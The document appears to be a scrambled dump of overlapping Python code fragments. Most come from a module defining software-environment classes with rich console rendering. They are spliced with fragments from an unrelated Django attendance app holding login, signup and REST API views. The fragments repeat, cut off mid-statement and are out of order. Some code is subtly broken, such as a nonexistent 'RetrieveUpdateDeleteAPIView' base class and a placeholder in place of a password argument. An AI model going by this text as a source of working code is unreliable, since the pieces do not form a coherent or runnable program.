"in cls.environments: if environment.name == name: return environment return None @dataclass class Platform:",
"Path, name: str, description: t.Optional[str], platform: Platform, components: t.List[Component], ) -> None: \"\"\"\"\"\"",
"rich.console import Console from rich.console import ConsoleOptions from rich.console import Group from rich.console",
"components are unknown, specifically: {}\", len(unknown_components), len(self.components), \", \".join(unknown_components), ) return collected_components def",
"t.List[Component], ) -> None: \"\"\"\"\"\" self.path = path self.name = name self.description =",
"collected_components.append(component.software_component) else: unknown_components.append(component.name) if len(unknown_components) > 0: logger.error( \"{} of the {} requested",
") tree = Tree(title) for package in self.package_list: tree.add(package) return tree @dataclass class",
"str = \"system\" dependency: t.Optional[str] = None def __rich__(self) -> Tree: title =",
"from rich.markdown import Markdown from rich.panel import Panel from rich.table import Table from",
"purpose: t.Optional[str] version: t.Optional[str] software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\"",
"= Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\",",
"str value: str @dataclass class Packages: package_list: t.List[str] manager: str = \"system\" dependency:",
"def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any: \"\"\"The registry hooks into the",
"object construction lifecycle to register software environments. \"\"\" environment = super().__call__(*args, **kwds) if",
"from rich.console import Console from rich.console import ConsoleOptions from rich.console import Group from",
"t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str] = [] for component in self.components:",
"yield parent_table @dataclass class EnvironmentVariable: name: str value: str @dataclass class Packages: package_list:",
"platform: Platform, components: t.List[Component], ) -> None: \"\"\"\"\"\" self.path = path self.name =",
"yield self.platform table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, ) table.add_column(\"Name\")",
"from rich.console import ConsoleOptions from rich.console import Group from rich.console import group from",
"self.components: table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\" if component.software_component else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid()",
"from rich.console import Group from rich.console import group from rich.console import RenderResult from",
"== name: return environment return None @dataclass class Platform: env: t.List[EnvironmentVariable] packages: t.List[Packages]",
"class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering software environments.\"\"\" environments: t.List[SoftwareEnvironment] = []",
"registering software environments.\"\"\" environments: t.List[SoftwareEnvironment] = [] def __call__(cls, *args: t.Any, **kwds: t.Any)",
"= None def __rich__(self) -> Tree: title = ( self.manager if self.dependency is",
"t from dataclasses import dataclass from pathlib import Path from loguru import logger",
"in self.components: table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\" if component.software_component else \":cross_mark:\", \":white_check_mark:\" if",
"parent_table @dataclass class EnvironmentVariable: name: str value: str @dataclass class Packages: package_list: t.List[str]",
"None def __rich__(self) -> Tree: title = ( self.manager if self.dependency is None",
"return tree @dataclass class Image: id: str packages: t.List[Packages] @dataclass class Component: name:",
"typing as t from dataclasses import dataclass from pathlib import Path from loguru",
"t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\" path: Path name: str description:",
"__future__ import annotations import typing as t from dataclasses import dataclass from pathlib",
"class Platform: env: t.List[EnvironmentVariable] packages: t.List[Packages] images: t.List[Image] def __rich_console__( self, console: Console,",
"unknown, specifically: {}\", len(unknown_components), len(self.components), \", \".join(unknown_components), ) return collected_components def __rich__(self) ->",
"Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software Components",
"= Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for packages in self.packages: common_package_tree.add(packages.__rich__())",
"component.software_component else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield table return Panel(",
"cls.environments.append(environment) return environment @classmethod def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]: for environment in",
"lifecycle to register software environments. \"\"\" environment = super().__call__(*args, **kwds) if cls not",
"pathlib import Path from loguru import logger from rich.console import Console from rich.console",
"specifically: {}\", len(unknown_components), len(self.components), \", \".join(unknown_components), ) return collected_components def __rich__(self) -> Panel:",
"*args: t.Any, **kwds: t.Any) -> t.Any: \"\"\"The registry hooks into the object construction",
"return environment @classmethod def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]: for environment in cls.environments:",
"tree @dataclass class Image: id: str packages: t.List[Packages] @dataclass class Component: name: str",
"({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image in self.images: package_tree = Tree(\"packages\") for packages in",
"image_table) yield parent_table @dataclass class EnvironmentVariable: name: str value: str @dataclass class Packages:",
"selected platform supports component? collected_components.append(component.software_component) else: unknown_components.append(component.name) if len(unknown_components) > 0: logger.error( \"{}",
"in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class EnvironmentVariable: name:",
"construction lifecycle to register software environments. \"\"\" environment = super().__call__(*args, **kwds) if cls",
"Table from rich.tree import Tree from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass",
"import dataclass from pathlib import Path from loguru import logger from rich.console import",
"\":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield table return Panel( Group(get_renderables()), title=f\"Environment: {self.name}\",",
"loguru import logger from rich.console import Console from rich.console import ConsoleOptions from rich.console",
"f\"{self.manager} ({self.dependency})\" ) tree = Tree(title) for package in self.package_list: tree.add(package) return tree",
"[] def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any: \"\"\"The registry hooks into",
"rich.console import Group from rich.console import group from rich.console import RenderResult from rich.markdown",
"the {} requested components are unknown, specifically: {}\", len(unknown_components), len(self.components), \", \".join(unknown_components), )",
"for packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\")",
"t.List[str] manager: str = \"system\" dependency: t.Optional[str] = None def __rich__(self) -> Tree:",
"package in self.package_list: tree.add(package) return tree @dataclass class Image: id: str packages: t.List[Packages]",
"name: str description: t.Optional[str] platform: Platform components: t.List[Component] def __init__( self, path: Path,",
"else: unknown_components.append(component.name) if len(unknown_components) > 0: logger.error( \"{} of the {} requested components",
"software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\" path: Path name: str",
"import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering software environments.\"\"\" environments: t.List[SoftwareEnvironment]",
"dataclass from pathlib import Path from loguru import logger from rich.console import Console",
"for component in self.components: table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\" if component.software_component else \":cross_mark:\",",
"responsible for registering software environments.\"\"\" environments: t.List[SoftwareEnvironment] = [] def __call__(cls, *args: t.Any,",
"Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass",
"Platform components: t.List[Component] def __init__( self, path: Path, name: str, description: t.Optional[str], platform:",
"str packages: t.List[Packages] @dataclass class Component: name: str purpose: t.Optional[str] version: t.Optional[str] software_component:",
"common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for packages in self.packages:",
"Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, )",
"collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str] = [] for component in self.components: if",
"-> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\")",
"get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True,",
"image_table.add_column(\"Packages\") for image in self.images: package_tree = Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__())",
"str @dataclass class Packages: package_list: t.List[str] manager: str = \"system\" dependency: t.Optional[str] =",
"in self.package_list: tree.add(package) return tree @dataclass class Image: id: str packages: t.List[Packages] @dataclass",
"Platform: env: t.List[EnvironmentVariable] packages: t.List[Packages] images: t.List[Image] def __rich_console__( self, console: Console, options:",
"class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\" path: Path name: str description: t.Optional[str]",
"register software environments. \"\"\" environment = super().__call__(*args, **kwds) if cls not in cls.environments:",
"= path self.name = name self.description = description self.platform = platform self.components =",
"Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table =",
"{}\", len(unknown_components), len(self.components), \", \".join(unknown_components), ) return collected_components def __rich__(self) -> Panel: @group()",
"t.Optional[str] software_component: t.Optional[SoftwareComponent] class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry): \"\"\"Base class for software environments.\"\"\" path: Path name:",
"components: t.List[Component] def __init__( self, path: Path, name: str, description: t.Optional[str], platform: Platform,",
") yield table return Panel( Group(get_renderables()), title=f\"Environment: {self.name}\", title_align=\"left\", subtitle=f\"Path: {self.path}\", subtitle_align=\"right\", )",
"t.Optional[str] = None def __rich__(self) -> Tree: title = ( self.manager if self.dependency",
"-> Tree: title = ( self.manager if self.dependency is None else f\"{self.manager} ({self.dependency})\"",
"t.List[Packages] images: t.List[Image] def __rich_console__( self, console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]:",
"import ConsoleOptions from rich.console import Group from rich.console import group from rich.console import",
"for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class",
"from rich.console import RenderResult from rich.markdown import Markdown from rich.panel import Panel from",
"def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str] = [] for",
"\":white_check_mark:\" if component.software_component else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield table",
"def __init__( self, path: Path, name: str, description: t.Optional[str], platform: Platform, components: t.List[Component],",
"unknown_components: t.List[str] = [] for component in self.components: if component.software_component: logger.trace(\"Requested component '{}'",
"from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering software environments.\"\"\"",
"-> t.Optional[SoftwareEnvironment]: for environment in cls.environments: if environment.name == name: return environment return",
") -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False)",
"else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield table return Panel( Group(get_renderables()),",
"__rich__(self) -> Tree: title = ( self.manager if self.dependency is None else f\"{self.manager}",
"__rich_console__( self, console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column()",
"import logger from rich.console import Console from rich.console import ConsoleOptions from rich.console import",
"image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image in self.images: package_tree",
"self.components: if component.software_component: logger.trace(\"Requested component '{}' is known!\", component.name) # TODO: Check if",
"for software environments.\"\"\" path: Path name: str description: t.Optional[str] platform: Platform components: t.List[Component]",
"annotations import typing as t from dataclasses import dataclass from pathlib import Path",
"dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering software environments.\"\"\" environments:",
"= super().__call__(*args, **kwds) if cls not in cls.environments: cls.environments.append(environment) return environment @classmethod def",
"component '{}' is known!\", component.name) # TODO: Check if selected platform supports component?",
"rich.table import Table from rich.tree import Tree from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type):",
"super().__call__(*args, **kwds) if cls not in cls.environments: cls.environments.append(environment) return environment @classmethod def find_environment(cls,",
"image in self.images: package_tree = Tree(\"packages\") for packages in image.packages: package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree)",
"logger.trace(\"Requested component '{}' is known!\", component.name) # TODO: Check if selected platform supports",
"from rich.table import Table from rich.tree import Tree from dagos.core.components import SoftwareComponent class",
"ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in self.components: table.add_row( component.name,",
"packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\")",
"is known!\", component.name) # TODO: Check if selected platform supports component? collected_components.append(component.software_component) else:",
"from __future__ import annotations import typing as t from dataclasses import dataclass from",
"\"\"\" environment = super().__call__(*args, **kwds) if cls not in cls.environments: cls.environments.append(environment) return environment",
"@group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software Components ({len(self.components)})\",",
"len(self.components), \", \".join(unknown_components), ) return collected_components def __rich__(self) -> Panel: @group() def get_renderables():",
"__rich__(self) -> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table(",
"platform self.components = components def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components:",
"def __rich__(self) -> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table =",
"\":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield table return Panel( Group(get_renderables()), title=f\"Environment:",
"registry hooks into the object construction lifecycle to register software environments. \"\"\" environment",
"justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in self.components: table.add_row( component.name, component.purpose, component.version, \":white_check_mark:\" if",
"Panel from rich.table import Table from rich.tree import Tree from dagos.core.components import SoftwareComponent",
"self, console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None) parent_table.add_column() parent_table.add_column()",
"find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]: for environment in cls.environments: if environment.name == name:",
") table.add_column(\"Name\") table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in",
"= [] for component in self.components: if component.software_component: logger.trace(\"Requested component '{}' is known!\",",
"{} requested components are unknown, specifically: {}\", len(unknown_components), len(self.components), \", \".join(unknown_components), ) return",
"software environments.\"\"\" environments: t.List[SoftwareEnvironment] = [] def __call__(cls, *args: t.Any, **kwds: t.Any) ->",
"description: t.Optional[str], platform: Platform, components: t.List[Component], ) -> None: \"\"\"\"\"\" self.path = path",
"self.components = components def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str]",
"= Tree(title) for package in self.package_list: tree.add(package) return tree @dataclass class Image: id:",
"common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\") for packages in self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted",
"package_tree.add(packages.__rich__()) image_table.add_row(image.id, package_tree) parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class EnvironmentVariable: name: str value:",
"return collected_components def __rich__(self) -> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform",
"len(unknown_components) > 0: logger.error( \"{} of the {} requested components are unknown, specifically:",
") return collected_components def __rich__(self) -> Panel: @group() def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield",
"table.add_column(\"Purpose\", ratio=1) table.add_column(\"Version\", justify=\"right\") table.add_column(\"Found?\", justify=\"center\") table.add_column(\"Valid?\", justify=\"center\") for component in self.components: table.add_row(",
"rich.tree import Tree from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for",
"components def collect_components(self) -> t.List[SoftwareComponent]: collected_components: t.List[SoftwareComponent] = [] unknown_components: t.List[str] = []",
"Tree: title = ( self.manager if self.dependency is None else f\"{self.manager} ({self.dependency})\" )",
"if component.software_component.is_valid() else \":cross_mark:\", ) yield table return Panel( Group(get_renderables()), title=f\"Environment: {self.name}\", title_align=\"left\",",
"for package in self.package_list: tree.add(package) return tree @dataclass class Image: id: str packages:",
"environment.name == name: return environment return None @dataclass class Platform: env: t.List[EnvironmentVariable] packages:",
"components: t.List[Component], ) -> None: \"\"\"\"\"\" self.path = path self.name = name self.description",
"def get_renderables(): yield Markdown(f\"{self.description}\\n\") yield self.platform table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\",",
"Packages: package_list: t.List[str] manager: str = \"system\" dependency: t.Optional[str] = None def __rich__(self)",
"parent_table.add_row(common_package_table, image_table) yield parent_table @dataclass class EnvironmentVariable: name: str value: str @dataclass class",
"None: \"\"\"\"\"\" self.path = path self.name = name self.description = description self.platform =",
"= [] def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any: \"\"\"The registry hooks",
"self.packages: common_package_tree.add(packages.__rich__()) common_package_table.add_row(common_package_tree) image_table = Table(title=f\"Targeted Container Images ({len(self.images)})\") image_table.add_column(\"ID\") image_table.add_column(\"Packages\") for image",
"= Table(box=None) parent_table.add_column() parent_table.add_column() common_package_table = Table(title=\"Common Packages\", show_header=False) common_package_table.add_column(\"\") common_package_tree = Tree(\"packages\")",
"if self.dependency is None else f\"{self.manager} ({self.dependency})\" ) tree = Tree(title) for package",
"component.version, \":white_check_mark:\" if component.software_component else \":cross_mark:\", \":white_check_mark:\" if component.software_component.is_valid() else \":cross_mark:\", ) yield",
"self.description = description self.platform = platform self.components = components def collect_components(self) -> t.List[SoftwareComponent]:",
"t.Optional[SoftwareEnvironment]: for environment in cls.environments: if environment.name == name: return environment return None",
"@dataclass class Packages: package_list: t.List[str] manager: str = \"system\" dependency: t.Optional[str] = None",
"class for software environments.\"\"\" path: Path name: str description: t.Optional[str] platform: Platform components:",
"manager: str = \"system\" dependency: t.Optional[str] = None def __rich__(self) -> Tree: title",
"def __rich_console__( self, console: Console, options: ConsoleOptions ) -> t.Generator[RenderResult]: parent_table = Table(box=None)",
"Tree(title) for package in self.package_list: tree.add(package) return tree @dataclass class Image: id: str",
"t.Optional[str] platform: Platform components: t.List[Component] def __init__( self, path: Path, name: str, description:",
"\"\"\"Base class for software environments.\"\"\" path: Path name: str description: t.Optional[str] platform: Platform",
"self.platform table = Table( title=f\"Software Components ({len(self.components)})\", title_justify=\"left\", show_lines=True, expand=True, ) table.add_column(\"Name\") table.add_column(\"Purpose\",",
"# TODO: Check if selected platform supports component? collected_components.append(component.software_component) else: unknown_components.append(component.name) if len(unknown_components)",
"= [] unknown_components: t.List[str] = [] for component in self.components: if component.software_component: logger.trace(\"Requested",
"import Tree from dagos.core.components import SoftwareComponent class SoftwareEnvironmentRegistry(type): \"\"\"A metaclass responsible for registering",
"not in cls.environments: cls.environments.append(environment) return environment @classmethod def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]:",
"t.List[Component] def __init__( self, path: Path, name: str, description: t.Optional[str], platform: Platform, components:"
] |
[
"if request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username')",
"else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED",
"= authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request,",
"Teacher, Student, Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer",
"LectureListView(generics.ListCreateAPIView): queryset = Lecture.objects.all() serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class=",
"generics from .models import Teacher, Student, Lecture, Div, Subject from .serializers import TeacherSerializer,",
"login_required from rest_framework import generics from .models import Teacher, Student, Lecture, Div, Subject",
"def signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username",
"return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer",
"serializer_class= LectureSerializer def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return",
"'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username =",
"authenticate(username=username, password=password) if user is not None: if user.is_active: login(request, user) return redirect('Attendance:dash')",
"Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def",
"render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid():",
"DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class",
"Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= DivSerializer def",
"'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>')",
".models import Teacher, Student, Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer,",
"class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self):",
"redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK",
"from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import login_required from rest_framework import",
"'' if request.POST: username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password)",
"django.views.generic import TemplateView from django.contrib.auth import logout, authenticate, login from django.contrib.auth.decorators import login_required",
"form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user",
"= forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user =",
"template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) #",
"username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return",
"import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView):",
"user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) #########################",
"TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class TestPage(TemplateView): template_name",
"def perform_create(self, serializer): serializer.save(user=self.request.user) class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class",
"from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html'",
"request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password",
"serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer",
"= 'Attendance/index.html' class TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def",
"class LectureDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= LectureSerializer def get_queryset(self): return Lecture.objects.all().filter(user=self.request.user) class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all()",
"def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView):",
".serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer class HomePage(TemplateView): template_name = 'Attendance/index.html' class",
"= Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class",
"queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user)",
"forms.TeacherLoginForm()}) @login_required def dash(request): return render(request, 'Attendance/login_success.html') def signup(request): if request.method == 'POST':",
"form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API",
"serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset",
"import generics from .models import Teacher, Student, Lecture, Div, Subject from .serializers import",
"# logout(request) # username = password = '' if request.POST: username = request.POST['username']",
"TeacherListView(generics.ListCreateAPIView): queryset = Teacher.objects.all() serializer_class= TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return",
"= forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form}) ######################### REST FRAMEWORK RELATED API VIEWS",
"if request.POST: username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if",
"signup(request): if request.method == 'POST': form = forms.UserCreateForm(request.POST) if form.is_valid(): form.save() username =",
"user.is_active: login(request, user) return redirect('Attendance:dash') return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()}) @login_required def dash(request):",
"return Subject.objects.all().filter(user=self.request.user) class DivisionListView(generics.ListCreateAPIView): queryset = Div.objects.all() serializer_class= DivSerializer class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= DivSerializer",
"form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm()",
"= Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self): return Subject.objects.all().filter(user=self.request.user) class",
"login(request, user) return redirect('Attendance:dash') else: form = forms.UserCreateForm() return render(request, 'Attendance/signup.html', {'form': form})",
"import Teacher, Student, Lecture, Div, Subject from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer,",
"Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user) class LectureListView(generics.ListCreateAPIView):",
"class SubjectListView(generics.ListCreateAPIView): queryset = Subject.objects.all() serializer_class= SubjectSerializer class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= SubjectSerializer def get_queryset(self):",
"= password = '' if request.POST: username = request.POST['username'] password = request.POST['password'] user",
"= 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request) # username = password = '' if",
"from django.contrib.auth.decorators import login_required from rest_framework import generics from .models import Teacher, Student,",
"if user is not None: if user.is_active: login(request, user) return redirect('Attendance:dash') return render(request,",
"form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request, user) return redirect('Attendance:dash') else:",
"TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset = Student.objects.all() serializer_class=",
"TestPage(TemplateView): template_name = 'Attendance/login_success.html' class ThanksPage(TemplateView): template_name = 'Attendance/logout_success.html' def login_user_teacher(request): # logout(request)",
"form.is_valid(): form.save() username = form.cleaned_data.get('username') raw_password = form.cleaned_data.get('<PASSWORD>') user = authenticate(username=username, password=<PASSWORD>) login(request,",
"queryset = Student.objects.all() serializer_class= StudentSerializer class StudentDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= StudentSerializer def get_queryset(self): return Student.objects.all().filter(username=self.request.user)",
"import render, redirect from django.urls import reverse_lazy from . import forms from django.views.generic",
"TeacherSerializer class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView): serializer_class= TeacherSerializer def get_queryset(self): return Teacher.objects.all().filter(username=self.request.user) class StudentListView(generics.ListCreateAPIView): queryset =",
